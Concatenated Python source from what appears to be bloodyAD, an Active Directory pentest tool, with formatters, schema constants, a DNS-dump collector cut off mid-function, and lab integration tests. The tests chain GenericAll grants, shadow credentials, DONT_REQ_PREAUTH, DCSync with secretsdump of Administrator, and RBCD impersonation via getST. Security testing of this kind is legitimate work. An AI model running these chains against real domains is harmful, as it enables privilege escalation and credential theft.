import logging, sys

LOG = logging.getLogger('bloodyAD')

def enableCliLogger(level="DEBUG"):
    # If we want to get the logs of every library we used (and which properly defined their loggers)
    if level == "TRACE":
        # logging.basicConfig(
        #         level=logging.DEBUG,
        #         #format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
        #     )
        logging.getLogger().setLevel(logging.DEBUG)
        level = "DEBUG"
    LOG.propagate = False
    LOG.setLevel("DEBUG")
    handler = logging.StreamHandler(sys.stdout)
    class SymbolFormatter(logging.Formatter):
        LEVEL_SYMBOLS = {
            logging.DEBUG: '[*]',
            logging.INFO: '[+]',
            logging.WARNING: '[!]',
            logging.ERROR: '[-]',
            logging.CRITICAL: '[X]',
        }
        def format(self, record):
            symbol = self.LEVEL_SYMBOLS.get(record.levelno, '[?]')
            return f"{symbol} {record.getMessage()}"
    handler.setFormatter(SymbolFormatter())
    handler.setLevel(getattr(logging, level))
    LOG.addHandler(handler)

class BloodyError(Exception):
    pass


class LDAPError(BloodyError):
    pass


class ResultError(LDAPError):
    def __init__(self, result):
        self.result = result

        if self.result["result"] == 50:
            self.message = (
                "Could not modify object, the server reports insufficient rights: "
                + self.result["message"]
            )
        elif self.result["result"] == 19:
            self.message = (
                "Could not modify object, the server reports a constrained"
                " violation: " + self.result["message"]
            )
        else:
            self.message = "The server returned an error: " + self.result["message"]

        super().__init__(self.message)


class NoResultError(LDAPError):
    def __init__(self, search_base, ldap_filter):
        self.filter = ldap_filter
        self.base = search_base
        self.message = f"No object found in {self.base} with filter: {self.filter}"
        super().__init__(self.message)


class TooManyResultsError(LDAPError):
    def __init__(self, search_base, ldap_filter, entries):
        self.filter = ldap_filter
        self.base = search_base
        self.limit = 10
        self.entries = list(entries)

        if len(self.entries) <= self.limit:
            self.results = "\n".join(entry["dn"] for entry in entries)
            self.message = (
                f"{len(self.entries)} objects found in {self.base} with"
                f" filter: {ldap_filter}\n"
            )
            self.message += "\tPlease put the full target DN\n"
            self.message += f"\tResult of query: \n{self.results}"
        else:
            self.message = (
                f"\tMore than {self.limit} entries in {self.base} match {self.filter}"
            )
            self.message += "\tPlease put the full target DN"

        super().__init__(self.message)



import binascii


class DNBinary:
    """
    Object(DN-Binary) - adschema
    """

    def __init__(self, data=None):
        if not data:
            return
        data = data.decode("utf-8").split(":")
        if len(data) != 4 or data[0] != "B":
            raise TypeError("can't convert str to DN-Binary")
        self.count = int(data[1])
        self.binary_value = data[2]

        self.value = binascii.unhexlify(self.binary_value)
        self.dn = data[3]

    def fromCanonical(self, value, dn):
        self.value = value
        self.dn = dn
        self.binary_value = binascii.hexlify(value).decode()
        self.count = len(self.binary_value)

    def __str__(self):
        return f"B:{self.count}:{self.binary_value}:{self.dn}"


# see https://social.technet.microsoft.com/wiki/contents/articles/37395.active-directory-schema-versions.aspx
SCHEMA_VERSION = {
    "13": "Windows 2000 Server",
    "30": "Windows Server 2003",
    "31": "Windows Server 2003 R2",
    "44": "Windows Server 2008",
    "47": "Windows Server 2008 R2",
    "56": "Windows Server 2012",
    "69": "Windows Server 2012 R2",
    "87": "Windows Server 2016",
    "88": "Windows Server 2019/2022",
    "91": "Windows Server 2025",
}

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/d7422d35-448a-451a-8846-6a7def0044df?redirectedfrom=MSDN
FUNCTIONAL_LEVEL = {
    "0": "DS_BEHAVIOR_WIN2000",
    "1": "DS_BEHAVIOR_WIN2003_WITH_MIXED_DOMAINS",
    "2": "DS_BEHAVIOR_WIN2003",
    "3": "DS_BEHAVIOR_WIN2008",
    "4": "DS_BEHAVIOR_WIN2008R2",
    "5": "DS_BEHAVIOR_WIN2012",
    "6": "DS_BEHAVIOR_WIN2012R2",
    "7": "DS_BEHAVIOR_WIN2016",
    "10": "DS_BEHAVIOR_WIN2025",
}

# [MS-ADTS] - 6.1.1.4 Well-Known Objects
WELLKNOWN_GUID = {
    "AA312825768811D1ADED00C04FD8D5CD": "GUID_COMPUTERS_CONTAINER_W",
    "18E2EA80684F11D2B9AA00C04F79F805": "GUID_DELETED_OBJECTS_CONTAINER_W",
    "A361B2FFFFD211D1AA4B00C04FD7D83A": "GUID_DOMAIN_CONTROLLERS_CONTAINER_W",
    "22B70C67D56E4EFB91E9300FCA3DC1AA": "GUID_FOREIGNSECURITYPRINCIPALS_CONTAINER_W",
    "2FBAC1870ADE11D297C400C04FD8D5CD": "GUID_INFRASTRUCTURE_CONTAINER_W",
    "AB8153B7768811D1ADED00C04FD8D5CD": "GUID_LOSTANDFOUND_CONTAINER_W",
    "F4BE92A4C777485E878E9421D53087DB": "GUID_MICROSOFT_PROGRAM_DATA_CONTAINER_W",
    "6227F0AF1FC2410D8E3BB10615BB5B0F": "GUID_NTDS_QUOTAS_CONTAINER_W",
    "09460C08AE1E4A4EA0F64AEE7DAA1E5A": "GUID_PROGRAM_DATA_CONTAINER_W",
    "AB1D30F3768811D1ADED00C04FD8D5CD": "GUID_SYSTEMS_CONTAINER_W",
    "A9D1CA15768811D1ADED00C04FD8D5CD": "GUID_USERS_CONTAINER_W",
    "1EB93889E40C45DF9F0C64D23BBB6237": "GUID_MANAGED_SERVICE_ACCOUNTS_CONTAINER_W",
}

# [MS-ADTS] 6.1.6.7.12 trustDirection
TRUST_DIRECTION = {"DISABLED": 0, "INBOUND": 1, "OUTBOUND": 2, "BIDIRECTIONAL": 3}

# [MS-ADTS] 6.1.6.7.15 trustType
TRUST_TYPE = {"LOCAL_WINDOWS": 1, "AD": 2, "NON_WINDOWS": 3, "AZURE": 5}

# [MS-ADTS] 6.1.6.7.9 trustAttributes
TRUST_ATTRIBUTES = {
    "NON_TRANSITIVE": 0x1,
    "UPLEVEL_ONLY": 0x2,
    "QUARANTINED_DOMAIN": 0x4,
    "FOREST_TRANSITIVE": 0x8,
    "CROSS_ORGANIZATION": 0x10,
    "WITHIN_FOREST": 0x20,
    "TREAT_AS_EXTERNAL": 0x40,
    "USES_RC4_ENCRYPTION": 0x80,
    "CROSS_ORGANIZATION_NO_TGT_DELEGATION": 0x200,
    "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION": 0x800,
    "PIM_TRUST": 0x400,
}



import unittest, subprocess, pathlib, json, os, re, binascii
from bloodyAD import md4


class TestModules(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        conf = json.loads((pathlib.Path(__file__).parent / "secrets.json").read_text())
        cls.domain = conf["domain"]
        cls.rootDomainNamingContext = ",".join(
            ["DC=" + subdomain for subdomain in cls.domain.split(".")]
        )
        cls.host = conf["pdc"]["ip"]
        cls.hostname = conf["pdc"]["hostname"]
        cls.admin = {
            "username": conf["admin_user"]["username"],
            "password": conf["admin_user"]["password"],
        }
        cls.toTear = []
        cls.env = os.environ.copy()
        cls.bloody_prefix = [
            "python3",
            "bloodyAD.py",
            "--host",
            cls.hostname,
            "-d",
            cls.domain,
            "--dc-ip",
            cls.host,
            "-t",
            300
        ]
        cls.user = {"username": "stan.dard", "password": "Password1123!"}

    def test_01AuthCreateUser(self):
        # Add User
        self.createUser(self.admin, self.user["username"], self.user["password"])
        username_pass = ["-u", self.user["username"], "-p"]

        cleartext = username_pass + [self.user["password"]]
        ntlm = username_pass + [
            f":{md4.MD4(self.user['password'].encode('utf-16le')).hexdigest()}"
        ]

        self.launchProcess(
            [
                "getTGT.py",
                "-dc-ip",
                self.host,
                f"{self.domain}/{self.admin['username']}:{self.admin['password']}",
            ]
        )
        self.env["KRB5CCNAME"] = f"{self.admin['username']}.ccache"
        krb = ["-k"]

        certname = "bloodytest"
        full_certname = certname + ".pfx"
        if os.path.exists(full_certname):
            os.remove(full_certname)
        self.launchProcess(
            [
                "certipy",
                "req",
                "-dc-host",
                self.host,
                "-target",
                self.host,
                "-ca",
                "bloody-MAIN-CA",
                "-template",
                "User",
                "-p",
                self.admin["password"],
                "-debug",
                "-u",
                f"{self.admin['username']}@{self.domain}",
                "-out",
                certname,
            ],
            ignoreErr=True,
        )

        # self.launchProcess(
        #     [
        #         "openssl",
        #         "pkcs12",
        #         "-in",
        #         "bloodytest.pfx",
        #         "-out",
        #         "bloodytest.pem",
        #         "-nodes",
        #         "-passin",
        #         "pass:",
        #     ]
        # )
        cert = ["-c", ':'+full_certname]

        auths = [cleartext, ntlm, krb, cert]
        for auth in auths:
            for sec_state in ["", "-s "]:
                self.launchProcess(
                    self.bloody_prefix
                    + auth
                    + (
                        sec_state + "get object Administrator --attr sAMAccountName"
                    ).split(" ")
                )

    def test_02SearchAndGetChildAndGetWritable(self):
        self.launchBloody(
            self.user,
            ["get", "children", "--target", "OU=Domain Controllers,DC=bloody,DC=corp"],
        )

        self.launchBloody(
            self.user,
            [
                "get",
                "search",
                "--filter",
                "(cn=Administrator)",
                "--attr",
                "description",
            ],
        )

        writableAll = self.launchBloody(self.user, ["get", "writable"])
        writableUserWrite = self.launchBloody(
            self.user, ["get", "writable", "--otype", "USER", "--right", "WRITE"]
        )
        self.assertIn(writableUserWrite, writableAll)

        self.assertRegex(
            self.launchBloody(self.user, ["get", "membership", self.user["username"]]),
            "Domain Users",
        )
        self.assertRegex(
            self.launchBloody(
                self.user, ["get", "membership", self.user["username"], "--no-recurse"]
            ),
            "No direct group membership",
        )

    def test_03UacOwnerGenericShadowGroupPasswordDCSync(self):
        slave = {"username": "slave", "password": "Password1243!"}
        # Tries another OU
        ou = "CN=FOREIGNSECURITYPRINCIPALS," + self.rootDomainNamingContext
        self.createUser(self.admin, slave["username"], slave["password"], ou=ou)
        self.launchBloody(
            slave,
            [
                "get",
                "object",
                f"CN={slave['username']},{ou}",
                "--attr",
                "distinguishedName",
            ],
        )

        # GenericAll
        self.launchBloody(
            self.admin,
            ["add", "genericAll", slave["username"], self.user["username"]],
        )
        self.toTear.append(
            (
                self.removeGenericAll,
                self.user,
                self.user["username"],
                slave["username"],
            )
        )

        # SetUAC
        self.launchBloody(
            self.user, ["add", "uac", slave["username"], "-f", "DONT_REQ_PREAUTH"]
        )
        self.assertRegex(
            self.launchBloody(
                self.user,
                [
                    "get",
                    "object",
                    slave["username"],
                    "--attr",
                    "UserAccountControl",
                ],
            ),
            "DONT_REQ_PREAUTH",
        )
        self.launchBloody(
            self.user,
            ["remove", "uac", slave["username"], "-f", "DONT_REQ_PREAUTH"],
        )

        # SetOwner
        self.launchBloody(
            self.user, ["set", "owner", slave["username"], self.user["username"]]
        )
        self.assertRegex(
            self.launchBloody(
                self.user,
                [
                    "get",
                    "object",
                    slave["username"],
                    "--attr",
                    "ntSecurityDescriptor",
                    "--resolve-sd",
                ],
                doPrint=False,
            ),
            f'Owner: {self.user["username"]}',
        )

        # Shadow
        outfile1 = "shado_cred"
        out_shado1 = self.launchBloody(
            self.user,
            ["add", "shadowCredentials", slave["username"], "--path", outfile1],
        )
        outfile2 = "shado_cred2"
        self.launchBloody(
            self.user,
            ["add", "shadowCredentials", slave["username"], "--path", outfile2],
        )
        id_shado1 = re.search("sha256 of RSA key: (.+)", out_shado1).group(1)

        self.launchBloody(
            self.user,
            ["remove", "shadowCredentials", slave["username"], "--key", id_shado1],
        )

        self.launchBloody(self.user, ["remove", "shadowCredentials", slave["username"]])
        # Delete the files with '.ccache' extension
        for file in [outfile1, outfile2]:
            ccache_file = f"{file}.ccache"
            if os.path.exists(ccache_file):
                os.remove(ccache_file)
        # Group
        self.launchBloody(
            self.admin, ["add", "genericAll", "IIS_IUSRS", self.user["username"]]
        )
        self.launchBloody(
            self.user, ["add", "groupMember", "IIS_IUSRS", slave["username"]]
        )
        self.launchBloody(
            self.user, ["remove", "groupMember", "IIS_IUSRS", slave["username"]]
        )

        # Password
        self.launchBloody(
            slave,
            [
                "set",
                "password",
                slave["username"],
                "Password124!",
                "--oldpass",
                slave["password"],
            ],
        )
        self.launchBloody(
            self.user, ["set", "password", slave["username"], slave["password"]]
        )

        # DCsync
        self.launchBloody(
            self.admin,
            ["add", "genericAll", self.rootDomainNamingContext, self.user["username"]],
        )
        self.launchBloody(self.user, ["add", "dcsync", slave["username"]])
        import time
        time.sleep(120)
        self.assertRegex(
            self.launchProcess(
                [
                    "secretsdump.py",
                    "-just-dc-user",
                    "BLOODY/Administrator",
                    f"{self.domain}/{slave['username']}:{slave['password']}@{self.host}",
                ]
            ),
            "Kerberos keys grabbed",
        )
        self.launchBloody(self.user, ["remove", "dcsync", slave["username"]])
        time.sleep(120)
        self.assertNotRegex(
            self.launchProcess(
                [
                    "secretsdump.py",
                    "-just-dc-user",
                    "BLOODY/Administrator",
                    f"{self.domain}/{slave['username']}:{slave['password']}@{self.host}",
                ]
            ),
            "Kerberos keys grabbed",
        )
        self.launchBloody(
            self.admin,
            [
                "remove",
                "genericAll",
                self.rootDomainNamingContext,
                self.user["username"],
            ],
        )

    def test_04ComputerRbcdGetSetAttribute(self):
        hostname = "test_pc"
        self.launchBloody(
            self.user,
            [
                "add",
                "computer",
                hostname,
                "Password1234!",
                "--ou",
                "CN=COMPUTERS," + self.rootDomainNamingContext,
            ],
        )
        self.toTear.append(
            (self.launchBloody, self.admin, ["remove", "object", hostname + "$"])
        )

        hostname2 = "test_pc2"
        hostname2_pass = "Password1235!"
        self.launchBloody(self.user, ["add", "computer", hostname2, hostname2_pass])
        self.toTear.append(
            (self.launchBloody, self.admin, ["remove", "object", hostname2 + "$"])
        )
        self.launchBloody(self.user, ["add", "rbcd", hostname + "$", hostname2 + "$"])

        hostname3 = "test_pc3"
        self.launchBloody(self.user, ["add", "computer", hostname3, "Password1236!"])
        self.toTear.append(
            (self.launchBloody, self.admin, ["remove", "object", hostname3 + "$"])
        )
        self.launchBloody(self.user, ["add", "rbcd", hostname + "$", hostname3 + "$"])

        # Test if rbcd correctly removed and doesn't remove all rbcd rights
        self.launchBloody(
            self.user, ["remove", "rbcd", hostname + "$", hostname3 + "$"]
        )
        self.assertNotRegex(
            self.launchBloody(
                self.user,
                [
                    "get",
                    "object",
                    hostname + "$",
                    "--resolve-sd",
                    "--attr",
                    "msDS-AllowedToActOnBehalfOfOtherIdentity",
                ],
            ),
            hostname3 + "$",
        )

        del self.env["KRB5CCNAME"]
        self.assertRegex(
            self.launchProcess(
                [
                    "getST.py",
                    "-spn",
                    f"HOST/{hostname}",
                    "-impersonate",
                    "Administrator",
                    "-dc-ip",
                    self.host,
                    f"{self.domain}/{hostname2}$:{hostname2_pass}",
                ],
                False,
            ),
            "Saving ticket in",
        )

        # SetAttr
        self.launchBloody(
            self.admin,
            ["add", "genericAll", hostname + "$", self.user["username"]],
        )
        self.launchBloody(
            self.user,
            [
                "set",
                "object",
                hostname + "$",
                "servicePrincipalName",
                "-v",
                "TOTO/my.local.domain",
                "-v",
                "TATA/imaginary.unicorn",
            ],
        )

    def test_05ComputerRbcdGetSetAttribute(self):
        managedPassword_raw = "01000000240200001000120114021c024dafdec827d690c71f64bd4d88a8351d23bdfa8eca206fc57d63450908c698f46a4902523d11614839b95e522c59bc78ae43ee869c25678052f4eca85010842b9c0e2e3c1d462cd839eaa83709e01452171218577e68cad4de9576c4a94b47da96f6a56c15bfa1a0a02769e6663c6bef47601d3079e3514d0a01e642a33c9bf4d5266e355d4511f421359d767355b8557363653d3adfe7b6950c1e443171c8b1b55249421bc1379e94abefcdd955ed2f1d6689f1b1095ef6e73fdbc853c4fe9c5dd3e0dc5ff51989ed2770d06b28f8cd2b92a61721e002b636e1eef1a53488b168af5b97081e3b75a4393a4b2ff614e3ae5ebeddde044bad2c5afe65b257f63a0000d22a8a7805c89cf00f66f3751c5167fa9066161ed146cb100465b56b5cb8719fc3b4ff5c0dc4f552824562eb7de0564bf1e2a2f542ed69a0de456dfdffcad0127ba1c3e9466ea8947737271cac6390167a590c2b6de8e72fe9d2b7d65a39f7419d29f8f248e988cc58a2451df60fa3d585c8828ff873fa19b07efea628a42a53b3e8cc8796035976760456d464a2ea817e14afd04a1e8ec0ec50df80381dbc1e3385297b0034f3a883b5ca5e515d21241b4e2c00bcf62c05ca52a58494fec4f0c7a06ebcfd865879a0bc57567fd3035d8207b2227c8c42fe5550dc96605726cb9c7c8acdfb638e57402e741d563aea4f7ff702416287a5903f379ca0c4eaa37c0000143b80910310000014ddafde02100000"
        managedPassword_nthash = "95f2a1e85bae294a9a3d8b32dffee725"

        managedPassword_raw = binascii.unhexlify(managedPassword_raw.encode())
        from bloodyAD.formatters.cryptography import MSDS_MANAGEDPASSWORD_BLOB

        managedPassword_blob = MSDS_MANAGEDPASSWORD_BLOB(managedPassword_raw)
        self.assertEqual(managedPassword_blob.getData(), managedPassword_raw)
        self.assertEqual(managedPassword_blob.toNtHash(), managedPassword_nthash)

    def test_06AddRemoveGetDnsRecord(self):
        self.launchBloody(
            self.user,
            [
                "add",
                "dnsRecord",
                "test.domain",
                "8.8.8.8",
                "--dnstype",
                "A",
                "--ttl",
                "50",
            ],
        )

        self.assertRegex(
            self.launchBloody(
                self.user,
                ["get", "dnsDump", "--zone", self.domain],
            ),
            "test.domain",
        )

        self.launchBloody(
            self.user,
            ["remove", "dnsRecord", "test.domain", "8.8.8.8", "--ttl", "50"],
        )

        self.assertNotRegex(
            self.launchBloody(
                self.user,
                ["get", "dnsDump", "--zone", self.domain],
            ),
            "test.domain",
        )

    def createUser(self, creds, usr, pwd, ou=None):
        args = ["add", "user", usr, pwd]
        if ou:
            args += ["--ou", ou]
        self.launchBloody(creds, args)
        self.toTear.append((self.launchBloody, creds, ["remove", "object", usr]))

    def removeGenericAll(self, creds, identity, target):
        self.launchBloody(creds, ["remove", "genericAll", target, identity])
        self.assertNotRegex(
            self.launchBloody(
                creds,
                [
                    "get",
                    "object",
                    target,
                    "--attr",
                    "ntSecurityDescriptor",
                    "--resolve-sd",
                ],
                doPrint=False,
            ),
            '"Trustee": "' + identity,
        )

    @classmethod
    def tearDownClass(cls):
        if not len(cls.toTear):
            return
        try:
            func = cls.toTear.pop()
            if len(func) > 1:
                func[0](*func[1:])
            else:
                func[0]()
        except Exception as e:
            raise e
        finally:
            cls.tearDownClass()

    def launchBloody(self, creds, args, isErr=True, doPrint=True):
        cmd_creds = ["-u", creds["username"], "-p", creds["password"]]
        return self.launchProcess(self.bloody_prefix + cmd_creds + args, isErr, doPrint)

    def launchProcess(self, cmd, isErr=True, doPrint=True, ignoreErr=False):
        out, err = subprocess.Popen(
            cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=self.env
        ).communicate()
        out = out.decode()
        if not ignoreErr:
            self.assertFalse(isErr and err, self.printErr(err.decode(), cmd))
        out += "\n" + err.decode()
        if doPrint:
            print(out)
        return out

    def printErr(self, err, cmd):
        err = err.replace("\n", "\n ")
        self.err = f"here is the error output ->\n\n {cmd}\n{err}"
        return self.err


if __name__ == "__main__":
    unittest.main(failfast=True)



from bloodyAD.formatters import (
    accesscontrol,
    common,
    cryptography,
    dns,
)
import base64
from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR


def formatAccountControl(userAccountControl):
    userAccountControl = int(userAccountControl.decode())
    return [
        key
        for key, val in accesscontrol.ACCOUNT_FLAGS.items()
        if userAccountControl & val == val
    ]


def formatTrustDirection(trustDirection):
    trustDirection = int(trustDirection.decode())
    for key, val in common.TRUST_DIRECTION.items():
        if trustDirection == val:
            return key
    return trustDirection


def formatTrustAttributes(trustAttributes):
    trustAttributes = int(trustAttributes.decode())
    return [
        key
        for key, val in common.TRUST_ATTRIBUTES.items()
        if trustAttributes & val == val
    ]


def formatTrustType(trustType):
    trustType = int(trustType.decode())
    for key, val in common.TRUST_TYPE.items():
        if trustType == val:
            return key
    return trustType


def formatSD(sd_bytes):
    return SECURITY_DESCRIPTOR.from_bytes(sd_bytes).to_sddl()


def formatFunctionalLevel(behavior_version):
    behavior_version = behavior_version.decode()
    return (
        common.FUNCTIONAL_LEVEL[behavior_version]
        if behavior_version in common.FUNCTIONAL_LEVEL
        else behavior_version
    )


def formatSchemaVersion(objectVersion):
    objectVersion = objectVersion.decode()
    return (
        common.SCHEMA_VERSION[objectVersion]
        if objectVersion in common.SCHEMA_VERSION
        else objectVersion
    )


def formatGMSApass(managedPassword):
    gmsa_blob = cryptography.MSDS_MANAGEDPASSWORD_BLOB(managedPassword)
    ntlm_hash = "aad3b435b51404eeaad3b435b51404ee:" + gmsa_blob.toNtHash()
    return {
        "NTLM": ntlm_hash,
        "B64ENCODED": base64.b64encode(gmsa_blob["CurrentPassword"]).decode(),
    }


def formatDnsRecord(dns_record):
    return dns.Record(dns_record).toDict()


def formatWellKnownObjects(wellKnown_object):
    dn_binary = common.DNBinary(wellKnown_object)
    if dn_binary.binary_value in common.WELLKNOWN_GUID:
        dn_binary.binary_value = common.WELLKNOWN_GUID[dn_binary.binary_value]
    return dn_binary


def formatKeyCredentialLink(key_dnbinary):
    return cryptography.KEYCREDENTIALLINK_BLOB(
        common.DNBinary(key_dnbinary).value
    ).toDict()


from badldap.protocol.typeconversion import (
    LDAP_WELL_KNOWN_ATTRS,
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES,
    single_guid,
    multi_bytes,
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC,
    int2timedelta,
)


def formatFactory(format_func, origin_format):
    def genericFormat(val, encode=False, *args):
        if encode:
            return origin_format(val, encode, *args)
        if not isinstance(val, list):
            return format_func(val)
        return [format_func(e) for e in val]
    # The function name is set to the original function name for encode changes logic
    genericFormat.__name__ = origin_format.__name__
    return genericFormat


def enableFormatOutput():
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC["msDS-AllowedToActOnBehalfOfOtherIdentity"] = (
        multi_bytes
    )
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES["nTSecurityDescriptor"] = formatFactory(
        formatSD, MSLDAP_BUILTIN_ATTRIBUTE_TYPES["nTSecurityDescriptor"]
    )
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-AllowedToActOnBehalfOfOtherIdentity"] = (
        formatFactory(formatSD, multi_bytes)
    )
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-GroupMSAMembership"] = formatFactory(
        formatSD, MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-GroupMSAMembership"]
    )
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-ManagedPassword"] = formatFactory(
        formatGMSApass, MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-ManagedPassword"]
    )
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES["userAccountControl"] = formatFactory(
        formatAccountControl, MSLDAP_BUILTIN_ATTRIBUTE_TYPES["userAccountControl"]
    )
    LDAP_WELL_KNOWN_ATTRS["msDS-User-Account-Control-Computed"] = formatFactory(
        formatAccountControl, LDAP_WELL_KNOWN_ATTRS["msDS-User-Account-Control-Computed"]
    )
    LDAP_WELL_KNOWN_ATTRS["trustDirection"] = formatFactory(
        formatTrustDirection, LDAP_WELL_KNOWN_ATTRS["trustDirection"]
    )
    LDAP_WELL_KNOWN_ATTRS["trustAttributes"] = formatFactory(
        formatTrustAttributes, LDAP_WELL_KNOWN_ATTRS["trustAttributes"]
    )
    LDAP_WELL_KNOWN_ATTRS["trustType"] = formatFactory(
        formatTrustType, LDAP_WELL_KNOWN_ATTRS["trustType"]
    )
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-Behavior-Version"] = formatFactory(
        formatFunctionalLevel, MSLDAP_BUILTIN_ATTRIBUTE_TYPES["msDS-Behavior-Version"]
    )
    LDAP_WELL_KNOWN_ATTRS["objectVersion"] = formatFactory(
        formatSchemaVersion, LDAP_WELL_KNOWN_ATTRS["objectVersion"]
    )
    LDAP_WELL_KNOWN_ATTRS["dnsRecord"] = formatFactory(
        formatDnsRecord, LDAP_WELL_KNOWN_ATTRS["dnsRecord"]
    )
    LDAP_WELL_KNOWN_ATTRS["msDS-KeyCredentialLink"] = formatFactory(
        formatKeyCredentialLink, LDAP_WELL_KNOWN_ATTRS["msDS-KeyCredentialLink"]
    )
    LDAP_WELL_KNOWN_ATTRS["attributeSecurityGUID"] = single_guid
    LDAP_WELL_KNOWN_ATTRS["wellKnownObjects"] = formatFactory(
        formatWellKnownObjects, LDAP_WELL_KNOWN_ATTRS["wellKnownObjects"]
    )
    LDAP_WELL_KNOWN_ATTRS["msDS-MinimumPasswordAge"] = int2timedelta

from winacl.dtyp.ace import (
    SYSTEM_AUDIT_OBJECT_ACE,
    SDDL_ACE_TYPE_MAPS_INV,
    aceflags_to_sddl,
    accessmask_to_sddl,
    ACE_OBJECT_PRESENCE,
)


def to_sddl(self, sd_object_type=None):
    # ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;(resource_attribute)
    return "(%s;%s;%s;%s;%s;%s)" % (
        SDDL_ACE_TYPE_MAPS_INV[self.AceType],
        aceflags_to_sddl(self.AceFlags),
        accessmask_to_sddl(self.Mask, self.sd_object_type),
        (
            self.ObjectType.to_bytes()
            if self.AceFlags & ACE_OBJECT_PRESENCE.ACE_OBJECT_TYPE_PRESENT
            else ""
        ),
        (
            self.InheritedObjectType.to_bytes()
            if self.Flags & ACE_OBJECT_PRESENCE.ACE_INHERITED_OBJECT_TYPE_PRESENT
            else ""
        ),
        self.Sid.to_sddl(),
    )


setattr(SYSTEM_AUDIT_OBJECT_ACE, "to_sddl", to_sddl)



from bloodyAD import utils, asciitree
from bloodyAD.exceptions import LOG
from bloodyAD.network.ldap import Scope
from bloodyAD.exceptions import NoResultError
from badldap.commons.exceptions import LDAPSearchException
from typing import Literal
import re, asyncio


async def bloodhound(conn, transitive: bool = False, path: str = "CurrentPath"):
    """
    BloodHound CE collector (WARNING: This script is still in development. It only provides the basics - ADCS ESC and other complex nodes aren't supported yet)

    :param transitive: if set, will try to reach trusts to have more complete results (you should start from a dc of your user domain to have more complete results)
    :param path: filepath for the generated zip file
    """
    from badldap import bloodhound

    output_path = None
    if path != "CurrentPath":
        output_path = path
    ldap = await conn.getLdap()
    bh = bloodhound.MSLDAPDump2Bloodhound(ldap.co_url, follow_trusts=transitive, output_path=output_path)
    await bh.run()

async def children(conn, target: str = "DOMAIN", otype: str = "*", direct: bool = False):
    """
    List children for a given target object

    :param target: sAMAccountName, DN or SID of the target
    :param otype: special keyword "useronly" or objectClass of objects to fetch e.g. user, computer, group, trustedDomain, organizationalUnit, container, groupPolicyContainer, msDS-GroupManagedServiceAccount, etc
    :param direct: Fetch only direct children of target
    """
    ldap = await conn.getLdap()
    if target == "DOMAIN":
        target = ldap.domainNC
    scope = Scope.LEVEL if direct else Scope.SUBTREE
    if otype == "useronly":
        otype_filter = "sAMAccountType=805306368"
    else:
        otype_filter = f"objectClass={otype}"
    async for entry in ldap.bloodysearch(
        target,
        f"(&({otype_filter})(!(distinguishedName={target})))",
        search_scope=scope,
        attr=["distinguishedName"],
    ):
        yield entry


async def dnsDump(conn, zone: str = None, no_detail: bool = False, transitive: bool = False):
    """
    Retrieve DNS records of the Active Directory readable/listable by the user

    :param zone: if set, prints only records in this zone
    :param no_detail: if set doesn't include system records such as _ldap, _kerberos, @, etc
    :param transitive: if set, try to fetch dns records in AD trusts (you should start from a DC of your user domain to have exhaustive results)
    """

    async def domainDnsDump(conn, zone=None, no_detail=False):
        entries = None
        filter = "(|(objectClass=dnsNode)(objectClass=dnsZone))"
        prefix_blacklist = [
            "gc",
            "_gc.*",
            "_kerberos.*",
            "_kpasswd.*",
            "_ldap.*",
            "_msdcs",
            "@",
            "DomainDnsZones",
            "ForestDnsZones",
        ]
        suffix_blacklist = ["RootDNSServers", "..TrustAnchors"]

        if no_detail:
            prefix_filter = ""
            for prefix in prefix_blacklist:
                prefix_filter += f"(!(name={prefix}))"
            filter = f"(&{filter}{prefix_filter})"

        ldap = await conn.getLdap()
        dnsZones = []
        for nc in ldap.appNCs + [ldap.domainNC]:
            try:
                entries = ldap.bloodysearch(
                    nc,
                    filter,
                    search_scope=Scope.SUBTREE,
                    attr=["dnsRecord", "name", "objectClass"],
                )
                async for entry in entries:
                    domain_suffix = entry["distinguishedName"].split(",")[1]
                    domain_suffix = domain_suffix.split("=")[1]

                    # RootDNSServers and ..TrustAnchors are system records not interesting for offensive normally
                    if domain_suffix in suffix_blacklist:
                        continue

                    if zone and zone not in domain_suffix:
                        continue

                    # We keep dnsZone to list their children later
                    # Useful if we have list_child on it but no read_prop on the child record
                    if "dnsZone" in entry["objectClass"]:
                        dnsZones.append(entry["distinguishedName"])
                        if entry["name"] not in suffix_blacklist:
                            yield {"zoneName": entry["name"]}
                        continue

                    domain_name = entry["name"]

                    if domain_name == "@":  # @ is for dnsZone info
                        domain_name = domain_suffix
                    else:  # even for reverse lookup (X.X.X.X.in-addr.arpa), domain suffix should be the parent name?
                        if (
                            domain_name[-1] != "."
                        ):  # Then it's probably not a fqdn, suffix needed
                            domain_name = domain_name + "." + domain_suffix

                    ip_addr = domain_name.split(".in-addr.arpa")
                    if len(ip_addr) > 1:
                        decimals = ip_addr[0].split(".")
                        decimals.reverse()
                        while len(decimals) < 4:
                            decimals.append("0")
                        domain_name = ".".join(decimals)

                    yield_entry = {"recordName": domain_name}

                    for record in entry.get("dnsRecord", []):
                        try:
                            if record["Type"] not in yield_entry:
                                yield_entry[record["Type"]] = []
                            if record["Type"] in [
                                "A",
                                "AAAA",
                                "NS",
                                "CNAME",
                                "PTR",
                                "TXT",
                            ]:
                                yield_entry[record["Type"]].append(record["Data"])
                            elif record["Type"] == "MX":
                                yield_entry[record["Type"]].append(
                                    record["Data"]["Name"]
                                )
                            elif record["Type"] == "SRV":
                                yield_entry[record["Type"]].append(
                                    f"{record['Data']['Target']}:{record['Data']['Port']}"
                                )
                            elif record["Type"] == "SOA":
                                yield_entry[record["Type"]].append(
                                    {
                                        "PrimaryServer": record["Data"][
                                            "PrimaryServer"
                                        ],
                                        "zoneAdminEmail": record["Data"][
